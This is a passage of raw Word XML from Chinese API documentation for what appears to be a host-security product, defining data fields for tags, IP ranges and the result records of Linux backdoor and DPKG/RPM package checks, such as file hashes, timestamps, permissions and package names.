          <w:p w14:paraId="17739669" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22F69C41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="579F90DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F84F03C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A00FCFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CFC9E32" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D52661" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312E3CFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E6A960" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="524DA13B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="009BC6D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72F2FB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3845A2A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627D6BC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CFDF4A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73273BDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43302B08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29EFBBA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50260AE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659F19A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A83965" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07AE98BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E7C6ED8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="附录1-linux后门检测-查询结果-detail数据结构"/>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="233"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录1 Linux后门检测-查询结果-detail数据结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B54023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>共同字段说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="58DE0BE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26A7F97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AADADE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F46B67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C92003" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="618D05B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597A62B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="472A1E96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E42FFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E11F267" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72FC63E1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A208B46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8C082C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="102250AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7E151B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C19E080" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57909BFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BCE617" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D3EE80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B717ECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A3E8FAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C67587" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23978C85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07F680F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16BD60FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51A5233C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1A7115" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A710414" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB637C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65859B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16BC528A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47458B57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51FF5A94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C42AEAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353393DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="043F9D5A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B73606" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA05F5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F777529" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14D681D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F7F45EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1784386D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46755FF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEEC984" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B5976F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5534CC4C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AA95AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3CDBFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D0B0DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="091DBEFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01789EA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658E5806" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D3C4E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7735D33E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F5DEFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="113BDDEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6B211F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E25B6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DA8702" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="277A131C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BD602B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="检查功能dpkg-based应用后门检查rpm-based应用后门检查"/>
      <w:r>
        <w:t>检查功能：DPKG-based应用后门检查、RPM-based应用后门检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F2102"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2087"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="734BF83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142218C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310DA6D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C65BAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB7BFF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DBA7C8C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447D2FA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11997721" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477BEA94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77E31571" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包名，rpm：检查rpm包; dpkg：检查dpkg包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="512280C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5648E14C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F803AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B16F8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2710F8B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
